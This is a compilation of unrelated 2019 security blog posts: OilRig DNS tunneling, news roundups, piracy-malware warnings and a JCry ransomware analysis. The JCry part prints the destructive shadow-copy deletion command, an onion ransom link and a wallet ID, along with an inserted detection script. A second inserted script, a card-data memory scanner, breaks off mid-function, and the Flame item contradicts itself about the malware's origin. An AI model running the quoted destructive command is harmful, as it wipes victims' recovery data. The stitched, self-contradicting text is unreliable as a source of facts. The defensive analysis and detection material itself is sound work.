Much of the malware used by the group in its attacks over the years uses DNS tunneling to protect communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig’s usage of DNS tunneling was first documented in 2016; some of the Trojans in its arsenal that use it are Helminth, ISMAgent, QUADAGENT, BONDUPDATER, and ALMACommunicator.

DNS tunnelling OilRig

The analysis of the tunneling protocols used by OilRig shows that:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools leverage DNS queries to resolve specially crafted subdomains and send data to the command and control servers. The tools use the protocol in different ways: they differ in the structure of the subdomains queried, in the data received by the Trojans, and in the subdomains used to transmit data.

Experts observed multiple variants of the Helminth backdoor over the years, all using DNS A queries, but the threat actors changed the generated subdomains to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time,” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used ISMAgent in many campaigns; the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting data, the Trojan issues a beacon to inform the server that it is ready.

OilRig also leveraged two variants of ALMA Communicator in its attacks, each using a different domain structure. The two variants sent different information to the server and formatted the data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and the QUADAGENT Trojan; the latter uses AAAA queries to transmit and receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices,” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks.”

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Analyzing OilRig’s malware that uses DNS Tunneling appeared first on Security Affairs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news. 


Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Smashing Security #124: Poisoned porn ads, the A word, and why why why Wipro?

The hacker who lived the high life after spreading malware via porn sites, Wipro demonstrates how to turn a cybersecurity crisis into a PR disaster, and why are humans listening in to your Alexa conversations?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by special guest Brian Honan.

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?

Continue reading...

Cyber News Rundown: Tax Extortion Ransomware Scams Corporations

Tax Extortion Emails Bring Major Threats

A new email campaign has been spotted threatening ransomware and DDoS attacks over fake tax documents allegedly held by the attackers if a Bitcoin ransom isn’t paid. The campaign authors also threaten to send fake tax documents to the IRS through a poorly-worded ransom email that even provides Wikipedia excerpts for each threat put forward. Fortunately, as the campaign seems to be focused on corporations rather than individuals, no payments have been made to the attacker’s crypto coin wallet address.

Hotel Reservation Data Leaking Through Third-Party Services

As major data breaches continue to flood headlines, a recent study has revealed that nearly two of every three hotels expose information about their guests to third parties. Excerpts of the data show names, social security numbers, and payment card details that could give unauthorized users the ability to compromise identities or make changes to current reservations. Most of the exposed data leaks through third-party services run on hotel websites that offer customers additional packages.

Ransomware Conspirator Jailed in the UK

Police in the UK have officially charged and jailed a man for his part in the operation of a global ransomware campaign with ties to a Russian criminal organization. Charges range from fraud and blackmail to computer misuse relating to DDoS attacks and the Essex man is set to face at least six years. By masquerading as an advertising agent looking to purchase ad space on high-traffic sites, he was able to infect ad links with malware and other exploits to spread his campaign.

Firefox Begins Blocking Cryptomining Scripts

Even after the demise of CoinHive, cryptomining scripts are still being secretly deployed on thousands of websites without the knowledge of their owners and visitors. With the release of Firefox 67 beta, Mozilla is hoping to completely protect its users from malicious scripts that download and run cryptominers and other unwanted tracking software by using a blacklist created by Disconnect, a VPN developer with a reputation for privacy protection. Additionally, the new Firefox version will block fingerprinting scripts commonly used to invade a user’s browsing privacy.

MyCar App Uses Hardcoded Credentials

Thousands of cars were left vulnerable after a widely used vehicle telematics system was found to use hardcoded credentials in its mobile apps. Used in dozens of different car models to enable remote control functions, the hardcoded credentials leave these vehicles accessible to anyone with the app’s source code and the plaintext credentials within it. Fortunately for users, the latest iOS and Android versions of the MyCar app have been updated to resolve this vulnerability.

The post Cyber News Rundown: Tax Extortion Ransomware Scams Corporations appeared first on Webroot Blog.

Excited about the Final Season of Game of Thrones? Be Careful Where You Watch It!

All Game of Thrones fans know it by now – the long-awaited final season is starting on Sunday, April 14th. While you may be overly excited to watch it, you may also be tempted to stream it online for free or resort to torrent websites and download it illegally.

By turning to these resources you are not only breaking copyright laws but possibly your computer as well.

According to the anti-malware researcher Muso, almost 190 billion visits were made to illegal piracy websites in 2018. Nearly half of these people visited the websites in search of television shows, and almost one in five visitors were looking for the latest movie.

Two years ago, before Season 7 of Game of Thrones was released, over 10 million Americans were planning to watch it illegally, and it would be safe to assume the numbers would look equally shocking this year.

Winter is coming, but so is malware

We decided to take a look at what domains our users have tried to access in the past two weeks, to see what type of content Thor Foresight blocked. We investigated all the domains containing keywords related to TV and videos in general.

Below you can see the keywords we looked at. The percentages were calculated out of the total number of TV and video-related keywords.

[Chart: Thor blocked domains, April]

Source: Heimdal Security Threat Intelligence Data

According to another recent report, the number of users who ran into TV shows-related malware in 2018 is one-third less than in 2017. But the rest of the findings don’t fall on the bright side at all. Interestingly enough, although there was a one-year gap between Season 7 and Season 8, Game of Thrones was the top target for malware in 2018.

This show alone accounted for 17% of all the infected pirated content in 2018, with almost 21,000 users attacked.

Where did malicious actors hide the largest number of infected files? Obviously, in the first and last episodes of each season of Game of Thrones, since those are the episodes you are least likely to miss.

The same research showed that Trojans were the most frequent malware type.

So what can happen if you watch TV shows and movies illegally?

Let’s go through some of the recently discovered security threats in the realm of torrents.

At the beginning of January 2019, a malicious Windows shortcut file was discovered on The Pirate Bay torrent tracker. It injected content from the attacker into browsers and altered search results from Google and other search engines or Wikipedia, also trying to steal cryptocurrency. The malware was hiding in files for the movie The Girl in the Spider’s Web.

At first glance, it looked like just some annoying adware, but after taking a closer look, researchers found that the malicious activity extends to web pages and Wikipedia entries. The attackers monitor websites for Bitcoin and Ethereum wallet addresses, looking to replace them with the attacker’s own.

On Google, the malware creates fake ads on the top search results. And when searching for certain terms, such as “spyware”, the first two results take you to a cybersecurity solution called “Total AV”.


What’s more, attackers have also created a Wikipedia donation scam, where they insert a fake banner that says Wikipedia now also accepts cryptocurrency donations. For more details, you can read the full story here.

The chain of recent malware events associated with torrent websites doesn’t stop here.

In March 2019, the “PirateMatryoshka” scheme was also brought to light.

What did the torrent files contain? Instead of the software you were hoping to download from The Pirate Bay, you would come across a Trojan disguised as genuine software. If you were to install it on your computer, you’d end up buried in adware. It doesn’t stop there, as additional installers can be introduced to bring even more malware and wreak havoc on your PC.

Traps can be hidden anywhere

Unfortunately, malicious actors are finding more and more ways to attack you. It seems they are now also relying on popular search terms to infiltrate your system.

Even searching for your favorite actor’s name could result in some unwanted results. For example, returns for “Emilia Clarke” are among those most likely to be infected with malware, according to a recent study. By clicking on these results, users are tricked into visiting malicious websites. What these websites can do is steal passwords or other personal info.

Malware could be hiding anywhere when you try to watch your favorite TV show illegally. To be one step ahead of cybercriminals, we recommend you also read our in-depth explanation:

Here are also a few key pieces of advice to keep in mind before watching Game of Thrones:

Never access suspicious links that promise you leaked episodes or exclusive early premieres.

Always look up the TV show’s episodes release dates. If something looks too good to be true, it probably is. Here is the Game of Thrones Season 8 complete schedule (the official US release dates):

  • Episode 1: April 14, 2019
  • Episode 2: April 21, 2019
  • Episode 3: April 28, 2019
  • Episode 4: May 5, 2019
  • Episode 5: May 12, 2019
  • Episode 6: May 19, 2019

Ditch the torrents and illegal streaming websites.

Here is what you can do instead:

  • Use subscription-based services, such as HBO Go or HBO Now, Hulu, Amazon, Playstation Vue, or Roku.
  • Download the episodes on iTunes, Google Play, or Amazon Prime. Yes, these options are pricier than using subscriptions, but if you don’t want to be committed to a subscription that’s perfectly fine.
  • If these services are not available in your current region, you can consider using a VPN. A VPN deals with these issues and on top of that, it’s crucial for online security. For instance, a VPN can provide good protection against man-in-the-middle attacks. In this case, someone could intercept your online traffic, and the data you think you share securely (for example, financial data) could be easily deciphered by hackers.
  • Beware of illegal streaming services that may look legit and could ask for your money just like a normal streaming service would!

Apply software updates constantly.

We can’t stress this enough – a lack of updates creates security holes that can be easily exploited by hackers.

Use an anti-malware solution to secure your digital life.

Thor Premium offers you protection against the most advanced malware threats and blocks them before they can reach your PC.

Final Words

Are the risks of watching TV shows and movies illegally actually worth it? We warned you, but it’s your decision to make.

Meanwhile, until the first episode of season eight is out, enjoy this version of GoT’s soundtrack, played by an old computer hardware orchestra:

What are your thoughts on online piracy? How are you planning to watch the final season of Game of Thrones? Share your comments in the section below.

The post Excited about the Final Season of Game of Thrones? Be Careful Where You Watch It! appeared first on Heimdal Security Blog.

New Version of Flame Malware Discovered

Flame was discovered in 2012, linked to Stuxnet, and believed to be American in origin. It has recently been linked to more modern malware through new analysis tools that find linkages between different software.

It seems that Flame did not disappear after it was discovered, as was previously thought. (Its controllers used a kill switch to disable and erase it.) It was rewritten and reintroduced.

Note that the article claims that Flame was believed to be Israeli in origin. That's wrong; most people who have an opinion believe it is from the NSA.

High-rolling hacker jailed after launching malware attacks via websites

A British man has been jailed for over six years after exploiting ad networks on pornographic websites to spread malware onto innocent users' computers.

The post High-rolling hacker jailed after launching malware attacks via websites appeared first on The State of Security.

TajMahal Spyware

Kaspersky has released details about a sophisticated nation-state spyware it calls TajMahal:

The TajMahal framework's 80 modules, Shulmin says, comprise not only the typical keylogging and screengrabbing features of spyware, but also never-before-seen and obscure tricks. It can intercept documents in a printer queue, and keep track of "files of interest," automatically stealing them if a USB drive is inserted into the infected machine. And that unique spyware toolkit, Kaspersky says, bears none of the fingerprints of any known nation-state hacker group.

It was found on the servers of an "embassy of a Central Asian country." No speculation on who wrote and controls it.

More details.

The scourge of stalkerware


Stalkerware. Software that allows someone else to spy upon every SMS text message you send or receive, who you’re speaking to on your smartphone, the pictures in your photo library, every social media post you make, your current location, and where you go and when.

The EFF’s Eva Galperin calls on the security industry to take stalkerware more seriously.

Malware Infected Medical Equipment Shows Fake Tumors

Israeli cybersecurity researchers have created malware capable of showing fake cancerous growths on CT and MRI scans.

The malware, called CT-GAN, served as a proof of concept to show the potential for hacking medical devices with fake medical images that were convincing enough to fool medical technicians. In a video demonstrating the exploit, researchers at Ben Gurion University described how such an attack might be deployed.

“Attacker[s] can alter 3D medical scans to remove existing, or inject non-existing, medical conditions. An attacker may do this to remove a political candidate / leader, sabotage / falsify research, perform murder / terrorism, or hold data ransom for money.”

In a blind study, CT-GAN had a 99% success rate in deceiving radiologists with fake cancer nodules, and a 94% success rate in hiding actual cancer nodules.

Medical facilities are frequently targeted by hackers, due in part to their reliance on networking technologies and their archives of sensitive personal information. A recent study showed that 1 in 4 healthcare facilities were hit by ransomware in 2018 alone.

Click here to see the original report describing the malware findings.

The post Malware Infected Medical Equipment Shows Fake Tumors appeared first on Adam Levin.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

JCry – A Ransomware written in Golang!

For several months, QH Labs has been observing an upswing in ransomware activity. We found a new ransomware family written in Go. Malware authors are finding it easier to write ransomware in Go than in traditional programming languages.

Infection of Jcry ransomware starts with a compromised website.

As shown in the image above, the malware author tries to deceive users by posing as an Adobe Flash Player update and downloading malware onto the user’s machine. Fig 1 contains part of the JavaScript hosted on the compromised domain, which downloads a malicious file from the given URL. When a deceived user clicks the Update button and executes the malicious file, intending to update Flash Player, the malware starts its execution.

Fig 1 : Part of malicious script.

Flow of Execution:

Technical Analysis:

The downloaded malware (flashplayer_install.exe) is a self-extracting archive. On execution, it extracts the components listed below into the “Startup” directory to establish persistence.


  1. msg.vbs
  2. Enc.exe
  3. Dec.exe

Fig 2 : Extracted components and SFX instructions.

As shown in the figure above, the malware extracts its components and starts msg.vbs along with enc.exe (the encryptor).


This file is used to make the user believe that the system tried to update Adobe Flash Player but access was denied.

Fig 3 : Message shown by msg.vbs

Enc.exe (Encryptor):

This executable is responsible for file encryption and it is written in Go language.

Fig 4 : Go Build ID and library strings of Go Lang found in file.

On execution, it first checks for the existence of a “personalKey.txt” file in the current directory to determine whether the system is already infected. If the file exists, the malware considers the system already infected and terminates itself; it also deletes msg.vbs and Enc.exe with the help of the decryptor file. For encryption, it uses a combination of the AES and RSA algorithms. File encryption is performed with AES-128 in CBC mode using a 16-byte initialization vector. A hardcoded RSA public key is found in the enc.exe file and is later used to encrypt the AES key.



Fig 6: Acquire Context for Crypto operations.

It encrypts files with the 138 extensions listed below.

“3dm, 3ds, 3g2, 3gp, 7z, ai, aif, apk, app, asf, asp, avi, b, bak, bin, bmp, c, cbr, cer, cfg, cfm, cgi, cpp, crx, cs, csr, css, csv, cue, dat, db, dbf, dcr, dds, deb, dem, der, dmg, dmp, doc, dtd, dwg, dxf, eps, fla, flv, fnt, fon, gam, ged, gif, gpx, gz, h, hqx, htm, ics, iff, iso, jar, jpg, js, jsp, key, kml, kmz, log, lua, m, m3u, m4a, m4v, max, mdb, mdf, mid, mim, mov, mp3, mp4, mpa, mpg, msg, msi, nes, obj, odt, otf, pct, pdb, pdf, php, pkg, pl, png, pps, ppt, ps, psd, py, rar, rm, rom, rpm, rss, rtf, sav, sdf, sh, sln, sql, srt, svg, swf, tar, tex, tga, thm, tif, tmp, ttf, txt, uue, vb, vcd, vcf, vob, wav, wma, wmv, wpd, wps, wsf, xlr, xls, xml, yuv, zip”

To speed up the encryption, it encrypts only 1 MB of data for files larger than 1 MB. After successfully encrypting a file, it appends the “.jcry” extension to the filename.

Fig 7:Encrypted files with jcry Extension.

After encrypting the files, it deletes all shadow copies with the following command:

“vssadmin delete shadows /all”

It then launches Dec.exe using a PowerShell command.

Fig 8: Vssadmin and PowerShell execution.


On execution, Dec.exe first terminates and deletes enc.exe. Dec.exe is a console application that asks for the decryption key (the RSA private key). Once a valid key is entered, it can decrypt the encrypted files.

Fig 9 : Dec.exe.

It also drops a ransom note on the desktop. To recover the encrypted files it demands $500 as ransom and provides an onion link (hxxp://kpx5wgcda7ezqjty.onion) where the infected user is told they will receive the private key after payment.

Fig 10: Ransom Note.
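The execution chain described above (components dropped into the Startup folder, shadow copies deleted with vssadmin, Dec.exe launched from PowerShell) can be correlated from ordinary process-creation telemetry. The following is an added detection example, not Quick Heal's code; the flat event dictionaries, host names and file paths are constructed for the example and do not follow a real Sysmon schema.

```python
"""Correlate constructed process-creation events into the JCry stages described above."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

STARTUP_FRAGMENT = r"\start menu\programs\startup"        # per-user Startup folder
JCRY_COMPONENTS = {"msg.vbs", "enc.exe", "dec.exe"}         # component names from the analysis
# "vssadmin delete shadows /all"; "vssadmin list shadows" must NOT match.
SHADOW_DELETE_RE = re.compile(r"delete\s+shadows\b.*/all", re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def jcry_stages(ev: dict) -> set:
    """Return the set of JCry stages a single event matches (possibly empty)."""
    image_path = ev["image"].lower()
    image = basename(ev["image"])
    parent = basename(ev.get("parent", ""))
    cmdline = ev.get("cmdline", "")
    stages = set()
    if STARTUP_FRAGMENT in image_path and image in JCRY_COMPONENTS:
        stages.add("component_in_startup")
    if image == "vssadmin.exe" and SHADOW_DELETE_RE.search(cmdline):
        stages.add("shadow_copy_deletion")
    if parent == "powershell.exe" and image == "dec.exe":
        stages.add("decryptor_via_powershell")
    return stages


def assess(events) -> dict:
    """Per host: ("jcry_chain" | "ransomware_like" | "suspicious" | "clean", stages)."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= jcry_stages(ev)
    verdicts = {}
    for host, stages in per_host.items():
        if len(stages) >= 2:
            verdict = "jcry_chain"          # several stages of the chain seen together
        elif "shadow_copy_deletion" in stages:
            verdict = "ransomware_like"     # generic ransomware behaviour, not JCry-specific
        elif stages:
            verdict = "suspicious"
        else:
            verdict = "clean"
        verdicts[host] = (verdict, sorted(stages))
    return verdicts


STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed events: WS-01 reproduces the chain, WS-02 is an admin listing shadows.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\Downloads\flashplayer_install.exe", "cmdline": ""},
    {"host": "WS-01", "parent": r"C:\Users\alice\Downloads\flashplayer_install.exe",
     "image": STARTUP + r"\Enc.exe", "cmdline": ""},
    {"host": "WS-01", "parent": STARTUP + r"\Enc.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all"},
    {"host": "WS-01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": STARTUP + r"\Dec.exe", "cmdline": ""},
    {"host": "WS-02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
    {"host": "WS-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Tool\tool.exe", "cmdline": ""},
]

if __name__ == "__main__":
    for host, (verdict, stages) in assess(SAMPLE_EVENTS).items():
        print(host, verdict, stages)
```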



flashplayer_install.exe: c86c75804435efc380d7fc436e344898
Enc.exe : 5B640BE895C03F0D7F4E8AB7A1D82947
Dec.exe : 6B4ED5D3FDFEFA2A14635C177EA2C30D
Recovery Link: hxxp://kpx5wgcda7ezqjty.onion
Wallet Id: 1FKWhzAeNhsZ2JQuWjWsEeryR6TqLkKFUt


Prevention tips:

  1. Regularly take a backup of your important data in external drives like HDD, pen drive or Cloud storage.
  2. Install an antivirus and keep it updated.
  3. Keep your Operating System and software up-to-date.
  4. Never click on links or download attachments from any unknown or unwanted sources.

Subject Matter Expert:

Nagesh lathakar, Pratik Pachpor | Quick Heal Security Labs

The post JCry – A Ransomware written in Golang! appeared first on Seqrite Blog.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Cyber News Rundown: Massive Data Breach at Georgia Tech

Massive Data Breach at Georgia Tech

It was recently revealed that the personal information on over 1.3 million people was illicitly accessed by hackers who breached Georgia Tech systems in December of last year. The breach is the second of the year for the university, and was only discovered after IT staff noted performance issues on a widely used web application that interacts with a major database for both students and staff. 

Restaurant Firm Admits to Data Breach

Earl Enterprises, the parent firm of several popular restaurants around the country, recently announced they had fallen victim to a point-of-sale breach at multiple restaurant locations over the last 10 months. At least 100 restaurants, including all locations of the Italian chain Buca di Beppo, have begun working on restoring their systems and contacting affected customers. Nearly 2.1 million payment card accounts have been found in a dark web marketplace that were posted just a month before the company made its discovery.

Toyota Confirms Sales Data Breach

Personal information for over 3.1 million individuals may have been compromised before officials found signs of unauthorized activity on an internal network used in multiple sales subsidiaries of Toyota and Lexus. While the company’s dealerships continue to provide service and parts to customers, this specific breach comes only a month after another cyber attack that impacted Toyota dealerships in Australia, leaving many customers worried about the safety of their data.

GPS Watches Display PWNED! Message

Nearly a year after researchers contacted the watch maker Vidimensio about multiple vulnerabilities in their GPS watches, a new message has appeared on watch maps. The phrase “PWNED!” has been seen on at least 20 different watch models as a message alerting the company to their poor security infrastructure, as end-users are susceptible to being tracked through their watches. More alarmingly, many of the devices were found to have this vulnerability after Germany passed a law banning smart-watches for children that were capable of remote-listening after it was found they often ran on unpatched firmware.

Ransomware Strikes Albany, NY

The city of Albany, New York has been working to restore normal operations after a ransomware attack took down several key components of its systems. Aside from a few document-specific requests, however, the vast majority of the functionality was left undisturbed throughout the attack and recovery process. According to officials, all public safety services remained fully operational and had staff working around the clock to continue to provide assistance or direct individuals to a working facility.

The post Cyber News Rundown: Massive Data Breach at Georgia Tech appeared first on Webroot Blog.

This Week in Security News: IIoT Threats and Malware Apps

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about security threats directed at smart manufacturing environments. Also, learn why malware installed from the Android app store increased by 100% last year.

Read on:

Security in the Era of Industry 4.0: Dealing With Threats to Smart Manufacturing Environments

As manufacturing companies continue to adopt Industry 4.0, many environments could still be falling short on security, leaving them vulnerable to attacks.

Arizona Beverages Hacked in Targeted Ransomware Attack: Report

Arizona Beverages is recovering from a ransomware infection that recently compromised scores of Windows servers and computers and effectively shut down sales operations for days. 

Android Security: Click Fraud Apps Drove 100% Malware Increase in Google Play for 2018

Security issues are no stranger to apps found on Google’s Play Store. Malware installed from the Android app store grew by 100 percent in 2018 due to click fraud apps. 

Capture the Flag Competitions Can Help Close the Security Skills Gap

Members of the security teams at IBM Collaboration Solutions (ICS) and Industry Solutions made a great impression when they spoke about the capture the flag (CTF) events they were building for students and the IT industry.

Health Information of 350,000 Oregon DHS Clients Exposed After Phishing Attack

The Oregon Department of Human Services (DHS) recently notified the public that the personal health information of over 350,000 clients had been exposed due to a phishing attack.

Vehicles and Mobility Services to be Secured Against Cyber-Attacks by Partners Trend Micro and Luxoft

Trend Micro and Luxoft are jointly introducing and deploying an Intrusion Detection System (IDS), designed to detect, mitigate and respond to cyber-attacks on connected cars. 

Desktop, Mobile Phishing Campaign Targets South Korean Websites, Steals Credentials Via Watering Hole

Trend Micro discovered a phishing campaign that has compromised at least four South Korean websites by injecting fake login forms to steal user credentials. 

Toyota Data Breach Affects Up to 3.1 Million Customers

Automotive maker Toyota announced that a data breach had hit its sales offices in Japan, exposing information on up to 3.1 million customers. 

Bashlite IoT Malware Updated with Mining and Backdoor Commands, Targets WeMo Devices

Trend Micro uncovered an updated Bashlite malware designed to add infected internet-of-things devices to a distributed-denial-of-service (DDoS) botnet.

New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy

In previous attacks, XLoader posed as Facebook, Chrome and other apps to trick users into downloading its malicious app. Trend Micro researchers found a new variant that uses a different way to lure users. 

Are you surprised to learn that there was a 100% malware increase in Google Play for 2018? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: IIoT Threats and Malware Apps appeared first on .

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.
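The card harvesting described above is what a point-of-sale RAM scraper does: it reads magnetic-stripe track data out of the payment application's memory, where it sits in the clear before it is encrypted for transmission. The Python below is an added example, not McAfee's or Earl Enterprises' code, and shows the same check from the responder's side: scan a memory dump for track 1 and track 2 layouts and confirm each candidate with the Luhn check, reporting only masked numbers. The sample dump, the cardholder name and the card numbers (ISO test PANs) are constructed for the example.

```python
"""Scan a memory dump for magnetic-stripe track data, the artefact a POS RAM scraper
steals. Added example: constructed sample dump, ISO test PANs only."""
import re

# Track 1, format B: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb'%B(\d{13,19})\^([^^?]{2,26})\^(\d{2})(\d{2})(\d{3})[^?]{0,40}\?')
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
# The ';' start sentinel is often missing from in-memory copies, so it is optional
# and captured separately: its presence tells us the PAN boundary is trustworthy.
TRACK2_RE = re.compile(rb'(;?)(\d{13,19})=(\d{2})(\d{2})(\d{3})\d{0,20}\??')


def luhn_ok(pan: str) -> bool:
    """Mod-10 check-digit test that every real PAN passes."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                 # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
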